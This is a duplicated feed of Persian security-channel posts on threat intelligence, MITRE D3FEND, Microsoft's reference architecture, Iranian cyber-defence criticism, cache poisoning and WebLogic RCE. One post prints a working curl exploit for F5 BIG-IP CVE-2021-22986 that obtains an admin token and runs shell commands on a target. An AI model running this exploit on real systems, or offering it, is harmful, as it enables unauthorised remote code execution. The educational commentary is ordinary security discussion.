#Cyber #Threat #Intelligence (CTI)
معماری یکپارچه دفاع سایبری که بواسطه CTI یا Cyber Threat Intelligence اتفاق می افتد میتواند تمامی سازمان های زیر مجموعه خدماتی ما را بصورت هم بسته بروز رسانی به شاخص های حمله یا IOCs کرد و بدین ترتیب یک دفاع جامع اتفاق می افتد، همچنین طراحی نقشه TTPs ها یا Tactics, Techniques, and Procedures را میبایست طراحی نموده و رفتار کامل حمله رخداده را ترسیم نمایند.
تیم آبی به تنهایی نمیتوانند در مقابل حملات پیشرفته (APT) عملکرد کاملی را از خود نشان دهند، به همین منظور در مهندسی مرکز کنترل امنیت همواره از متخصصین تیم بنفش استفاده می شود تا در کنار کنترل و محافظت به واسطه مکانیزم های دفاعی سازمانی، همواره یک تیم متخصص در سطح تیم های قرمز فرامین و کنش های سیستمی را کنترل و پایش کنند و با نگاه تکنیکی به کنش ها و ترافیک های در حال تردد اشراف داشته باشد.
@Unk9vvN
معماری یکپارچه دفاع سایبری که بواسطه CTI یا Cyber Threat Intelligence اتفاق می افتد میتواند تمامی سازمان های زیر مجموعه خدماتی ما را بصورت هم بسته بروز رسانی به شاخص های حمله یا IOCs کرد و بدین ترتیب یک دفاع جامع اتفاق می افتد، همچنین طراحی نقشه TTPs ها یا Tactics, Techniques, and Procedures را میبایست طراحی نموده و رفتار کامل حمله رخداده را ترسیم نمایند.
تیم آبی به تنهایی نمیتوانند در مقابل حملات پیشرفته (APT) عملکرد کاملی را از خود نشان دهند، به همین منظور در مهندسی مرکز کنترل امنیت همواره از متخصصین تیم بنفش استفاده می شود تا در کنار کنترل و محافظت به واسطه مکانیزم های دفاعی سازمانی، همواره یک تیم متخصص در سطح تیم های قرمز فرامین و کنش های سیستمی را کنترل و پایش کنند و با نگاه تکنیکی به کنش ها و ترافیک های در حال تردد اشراف داشته باشد.
@Unk9vvN
#Microsoft #Cybersecurity #Reference #Architectures (MCRA)
معماری امنیتی که شرکت مایکروسافت ارائه داده هم در راستای پوشش فضاهای ابری خودش بوده و هم زنجیره حملاتی که در هر مرحله تیم های قرمز طرح ریزی میکنند رو Coverage کنه، از این روی معماری بسیار مفیدی هستش،
همینطور در بخش IT Operations میبینیم که مؤلفه هایی استفاده شده که در سه بخش متمرکز شده است اول Endpoint Security دوم مکانیزم های Mitigations و دیگری Network Security است که منابع مورد نیاز شکارچیات تهدید خواهد بود.
سرویس Zero Trust User Access که برای تصدیق دسترسی کاربران و سطح دسترسی اونها به سرویس های درون سازمانی، بحث مدیریت ریسک ها و قوانین مدیریتی هم از موارد دیگه مدیریت اطلاعات و دیگر مواردی که در تصاویر مشخص هستش...
@Unk9vvN
معماری امنیتی که شرکت مایکروسافت ارائه داده هم در راستای پوشش فضاهای ابری خودش بوده و هم زنجیره حملاتی که در هر مرحله تیم های قرمز طرح ریزی میکنند رو Coverage کنه، از این روی معماری بسیار مفیدی هستش،
همینطور در بخش IT Operations میبینیم که مؤلفه هایی استفاده شده که در سه بخش متمرکز شده است اول Endpoint Security دوم مکانیزم های Mitigations و دیگری Network Security است که منابع مورد نیاز شکارچیات تهدید خواهد بود.
سرویس Zero Trust User Access که برای تصدیق دسترسی کاربران و سطح دسترسی اونها به سرویس های درون سازمانی، بحث مدیریت ریسک ها و قوانین مدیریتی هم از موارد دیگه مدیریت اطلاعات و دیگر مواردی که در تصاویر مشخص هستش...
@Unk9vvN
#Maher IR vs #Cyber_Defense US
بد نیست کمی اطلاعات آماری سازمان های متولی بحث امنیت دفاعی رو ببینیم و ببینیم که بازه عملکردی اونها تا کجاس،
قبل از این موضوع، جالبه که بدونید 67 گواهی محصول داخلی در حوزه محصولات امنیت داده شده که در نوع خودش جالبه چرا که نماوای این محصولات بعضا در دسترس نیست و نمیشود ارزیابی کیفی و عمکردی کرد تا نقاط ضعف و قوت آنها را شناخت،
اما در خصوص عملکرد مرکز ماهر هم اطلاعاتی به چشم میخوره که بازه عملکردی رو میتونید مشاهده کنید آیا مرکز ماهر در خصوص 303873 هزار نقطه آلوده، IOCs هایی هم منتشر کرده؟ تا در رویکرد های تکنیکی #CTI هم بشود از آنها استفاده کرد؟
یا در خصوص حملات سطح پیشرفته یعنی #APT چه TTPs هایی رو منتشر داشته این مرکز؟ همونطور که میدونید بزرگترین دغدغه های حملات سایبری حملات پیشرفته میباشد نه صرفا بات و RAT و دیگر موارد سطح معمول
آیا ما در خصوص شکار حملات سایبری سطح کشوری که بعضا کشورهای دیگر گزارشات Forensic و مفصلی رو منتشر میکنند ما هم اینگونه گزارشات رو از شرکت های داخلی یا مراکز حاکمیتی میبینیم؟
امیدوارم رویکردهای سایبری کشور بروز شود.
@Unk9vvN
بد نیست کمی اطلاعات آماری سازمان های متولی بحث امنیت دفاعی رو ببینیم و ببینیم که بازه عملکردی اونها تا کجاس،
قبل از این موضوع، جالبه که بدونید 67 گواهی محصول داخلی در حوزه محصولات امنیت داده شده که در نوع خودش جالبه چرا که نماوای این محصولات بعضا در دسترس نیست و نمیشود ارزیابی کیفی و عمکردی کرد تا نقاط ضعف و قوت آنها را شناخت،
اما در خصوص عملکرد مرکز ماهر هم اطلاعاتی به چشم میخوره که بازه عملکردی رو میتونید مشاهده کنید آیا مرکز ماهر در خصوص 303873 هزار نقطه آلوده، IOCs هایی هم منتشر کرده؟ تا در رویکرد های تکنیکی #CTI هم بشود از آنها استفاده کرد؟
یا در خصوص حملات سطح پیشرفته یعنی #APT چه TTPs هایی رو منتشر داشته این مرکز؟ همونطور که میدونید بزرگترین دغدغه های حملات سایبری حملات پیشرفته میباشد نه صرفا بات و RAT و دیگر موارد سطح معمول
آیا ما در خصوص شکار حملات سایبری سطح کشوری که بعضا کشورهای دیگر گزارشات Forensic و مفصلی رو منتشر میکنند ما هم اینگونه گزارشات رو از شرکت های داخلی یا مراکز حاکمیتی میبینیم؟
امیدوارم رویکردهای سایبری کشور بروز شود.
@Unk9vvN
#MITRE #D3FEND
همواره شاهد ماتریس تکنیک های تهاجمی بودیم که MITRE ATT&CK زحمت مستندسازیش رو بر دوش داشت و انجام میداد،
اما جدیدا یک ماتریس هم در خصوص تکنیک های تدافعی release شده که در تقابل سطوح مختلف مقاوم سازی و رهگیری و شناسایی، روش های موجود رو معرفی و ترسیم میکنه.
همانطور که میبینید بسیاری از فرایندهای کنترلی و رهگیری بصورت تکنیکی تعریف شده و میشود انجام داد، اما متاسفانه در کشور ما بجای خدمات دانش بنیان به معنی واقعی کلمه، شرکت ها ترجیح میدهند با محصولات خارجی همین فرایندهارو پیاده سازی کنند.
https://d3fend.mitre.org
@Unk9vvN
همواره شاهد ماتریس تکنیک های تهاجمی بودیم که MITRE ATT&CK زحمت مستندسازیش رو بر دوش داشت و انجام میداد،
اما جدیدا یک ماتریس هم در خصوص تکنیک های تدافعی release شده که در تقابل سطوح مختلف مقاوم سازی و رهگیری و شناسایی، روش های موجود رو معرفی و ترسیم میکنه.
همانطور که میبینید بسیاری از فرایندهای کنترلی و رهگیری بصورت تکنیکی تعریف شده و میشود انجام داد، اما متاسفانه در کشور ما بجای خدمات دانش بنیان به معنی واقعی کلمه، شرکت ها ترجیح میدهند با محصولات خارجی همین فرایندهارو پیاده سازی کنند.
https://d3fend.mitre.org
@Unk9vvN
#Cache_Poisoning #Cache_Deception #Cross_Site_Scripting #Host_Header_Injection
در این مطلب قصد داریم، یکی از حملات سایبری بر بستر وب، به نام Cache Poisoning، را شرح دهیم. اول، کمی با Cache و انواع آن آشنا خواهیم شد. دوم، به سراغ مفهوم پایه ای این آسیب پذیری و چگونگی شناسایی آن می رویم. سوم، عواقب آن را مرور می کنیم. چهارم، مکانیزم های دفاع در برابر این آسیب پذیری (Mitigations) و پنجم راه های دور زدن این مکانیزم ها را بررسی می کنیم.
در مورد Cache و انواع آن
به طور کلی حافظه نهان (Cache) در سطوح مختلف دنیای کامپیوتر مورد استفاده قرار می گیرد.…
⚠️ ادامه مطلب در لینک زیر
unk9vvn.com/2021/07/web-cache-poisoning/
@Unk9vvN
در این مطلب قصد داریم، یکی از حملات سایبری بر بستر وب، به نام Cache Poisoning، را شرح دهیم. اول، کمی با Cache و انواع آن آشنا خواهیم شد. دوم، به سراغ مفهوم پایه ای این آسیب پذیری و چگونگی شناسایی آن می رویم. سوم، عواقب آن را مرور می کنیم. چهارم، مکانیزم های دفاع در برابر این آسیب پذیری (Mitigations) و پنجم راه های دور زدن این مکانیزم ها را بررسی می کنیم.
در مورد Cache و انواع آن
به طور کلی حافظه نهان (Cache) در سطوح مختلف دنیای کامپیوتر مورد استفاده قرار می گیرد.…
⚠️ ادامه مطلب در لینک زیر
unk9vvn.com/2021/07/web-cache-poisoning/
@Unk9vvN
#Unauthenticated #Weblogic #RCE
چندین ساله که سرویس های Weblogic در پلتفرم های مختلف منجر به حملات RCE میشه که حاصل آسیب پذیری های مختلفی هستند، از این روی کشف آسیب پذیری بصورت WhiteBox در این سرویس ها بسیار موضوعیت داشته و هر ساله یک یا دو مورد آسیب پذیری سطح Critical عمومی میشود،
در تصویر پست بواسطه یک Request با روش POST به Endpoint مربوطه در سرویس Weblogic زده شده که نشون میده هکر مستقیما با استفاده از کلاس java.beans.XMLDecoder توانسته یک Initialize برای رسیدن به ProcessBuilder پیاده سازی کرده و با یک html encoding دستور ورودی به اکسپلویت رو در command_filtered قرار داده و بصورت void روش start رو فراخوانی کرده و RCE اتفاق می افته به همین راحتی،
دوستان از بحث Weblogic Pentest غافل نباشید چرا که بستر خوبی برای کشف bug برای bug bounty خواهد بود...
https://github.com/c0mmand3rOpSec/CVE-2017-10271
https://github.com/ZO1RO/CVE-2019-2890
@Unk9vvN
چندین ساله که سرویس های Weblogic در پلتفرم های مختلف منجر به حملات RCE میشه که حاصل آسیب پذیری های مختلفی هستند، از این روی کشف آسیب پذیری بصورت WhiteBox در این سرویس ها بسیار موضوعیت داشته و هر ساله یک یا دو مورد آسیب پذیری سطح Critical عمومی میشود،
در تصویر پست بواسطه یک Request با روش POST به Endpoint مربوطه در سرویس Weblogic زده شده که نشون میده هکر مستقیما با استفاده از کلاس java.beans.XMLDecoder توانسته یک Initialize برای رسیدن به ProcessBuilder پیاده سازی کرده و با یک html encoding دستور ورودی به اکسپلویت رو در command_filtered قرار داده و بصورت void روش start رو فراخوانی کرده و RCE اتفاق می افته به همین راحتی،
دوستان از بحث Weblogic Pentest غافل نباشید چرا که بستر خوبی برای کشف bug برای bug bounty خواهد بود...
https://github.com/c0mmand3rOpSec/CVE-2017-10271
https://github.com/ZO1RO/CVE-2019-2890
@Unk9vvN
#F5_iControl #REST Unauthenticated RCE (#SSRF) #CVE_2021_22986
باز هم سرویس های API این بار REST بر روی محصولات BIG-IP که یک آسیب پذیری در سطح Critical در نسخه 16.0x که میتواند منجر به اجرای کد بر روی سرور مربوطه شود، نوع آسیب پذیری SSRF بوده و کد بهره برداری زیر میباشد.
┌──(unk9vvn㉿avi)-[~]
└─$
@Unk9vvN
باز هم سرویس های API این بار REST بر روی محصولات BIG-IP که یک آسیب پذیری در سطح Critical در نسخه 16.0x که میتواند منجر به اجرای کد بر روی سرور مربوطه شود، نوع آسیب پذیری SSRF بوده و کد بهره برداری زیر میباشد.
┌──(unk9vvn㉿avi)-[~]
└─$
token=`curl -i -k -s -X $'POST' -H "Host: $TARGET" -H $'Accept-Language: en' -H $'Authorization: Basic YWRtaW46' -H $'Content-Type: application/json' -H $'Content-Length: 109' -H $'Connection: close' -b $'BIGIPAuthCookie=1234' --data-binary $'{\"username\":\"admin\",\x0d\x0a\"userReference\":{},\x0d\x0a\"loginReference\":{\"link\":\"http://$TARGET/mgmt/shared/gossip\"}\x0d\x0a}' "http://$TARGET/mgmt/shared/authn/login" | grep "{" | jq .token.token| sed 's/"//g'`;echo $token;curl -s -H "X-F5-Auth-Token: $token" -H "Content-Type: application/json" "http://$TARGET/mgmt/tm/util/bash" -d '{"command":"run","utilCmdArgs":"-c id"}' | jq .commandResult
https://support.f5.com/csp/article/K03009991@Unk9vvN
Unk9vvN
#Maher IR vs #Cyber_Defense US بد نیست کمی اطلاعات آماری سازمان های متولی بحث امنیت دفاعی رو ببینیم و ببینیم که بازه عملکردی اونها تا کجاس، قبل از این موضوع، جالبه که بدونید 67 گواهی محصول داخلی در حوزه محصولات امنیت داده شده که در نوع خودش جالبه چرا که نماوای…
#Maher IR vs #Cyber_Defense US
پیرو پست قبلی که انتقاداتی به نحوه عملکرد مرکز ماهر بصورت علمی وارد کردیم، اینبار یک نمونه از گزارشات مرکز دفاع سایبری آمریکا رو براتون تشریح میکنیم که ایرادات وارده مستند بشه،
خب در تصور شماره یک میبینید که اول اعلام میکنه مراکز مورد حمله کجا بوده و TTPs یا Tactic, Technique, Procedure براش ناشناس بوده و خب نکاتی رو هم اعلام میکنه...، در تصویر دوم بعد از گزارش جرم شناسی که انجام شده اعلام میکنه که مراحل حمله از پلن اول تا پلن انتهایی چطور بوده و خب میبینید که در تمامی پلن ها عدد Technique رو طبق مستندات MITRE ATT&CK تشریح کرده
در تصویر سوم هم باقی پلن های TTPs رو تشریح کرده که اگر دقت بکنید دقیقا گفته شده که حمله در مراحل مختلف چه تکنیک هایی رو پیاده کرده است، اما نکته خیلی جالب داستان اینجاس که در تصویر چهارم برای رهگیری و Mitigation این حملات اعلام کرده که شاخصه های حمله یا IOCs ها در دسترس عموم قرار گرفته شده که تیم های SOC بخش های دیگه کشور میتونن باهاش حمله رو اگر به اونها خواست اتفاق بی افته رهگیری کنند.
REF
@Unk9vvN
پیرو پست قبلی که انتقاداتی به نحوه عملکرد مرکز ماهر بصورت علمی وارد کردیم، اینبار یک نمونه از گزارشات مرکز دفاع سایبری آمریکا رو براتون تشریح میکنیم که ایرادات وارده مستند بشه،
خب در تصور شماره یک میبینید که اول اعلام میکنه مراکز مورد حمله کجا بوده و TTPs یا Tactic, Technique, Procedure براش ناشناس بوده و خب نکاتی رو هم اعلام میکنه...، در تصویر دوم بعد از گزارش جرم شناسی که انجام شده اعلام میکنه که مراحل حمله از پلن اول تا پلن انتهایی چطور بوده و خب میبینید که در تمامی پلن ها عدد Technique رو طبق مستندات MITRE ATT&CK تشریح کرده
در تصویر سوم هم باقی پلن های TTPs رو تشریح کرده که اگر دقت بکنید دقیقا گفته شده که حمله در مراحل مختلف چه تکنیک هایی رو پیاده کرده است، اما نکته خیلی جالب داستان اینجاس که در تصویر چهارم برای رهگیری و Mitigation این حملات اعلام کرده که شاخصه های حمله یا IOCs ها در دسترس عموم قرار گرفته شده که تیم های SOC بخش های دیگه کشور میتونن باهاش حمله رو اگر به اونها خواست اتفاق بی افته رهگیری کنند.
REF
@Unk9vvN